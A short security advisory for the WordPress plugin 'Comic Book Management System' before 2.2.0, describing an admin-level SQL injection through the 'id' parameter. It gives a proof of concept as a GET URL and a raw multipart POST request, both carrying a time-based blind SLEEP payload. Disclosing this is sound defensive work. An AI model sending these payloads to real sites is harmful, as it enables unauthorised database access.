Comic Book Management System < 2.2.0 – Admin+ SQLi

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

Proof of Concept

https://example.com/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)


POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707
Content-Length: 733
Origin: http://localhost:8080
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="id"

2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf)
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png"
Content-Type: image/png

PNG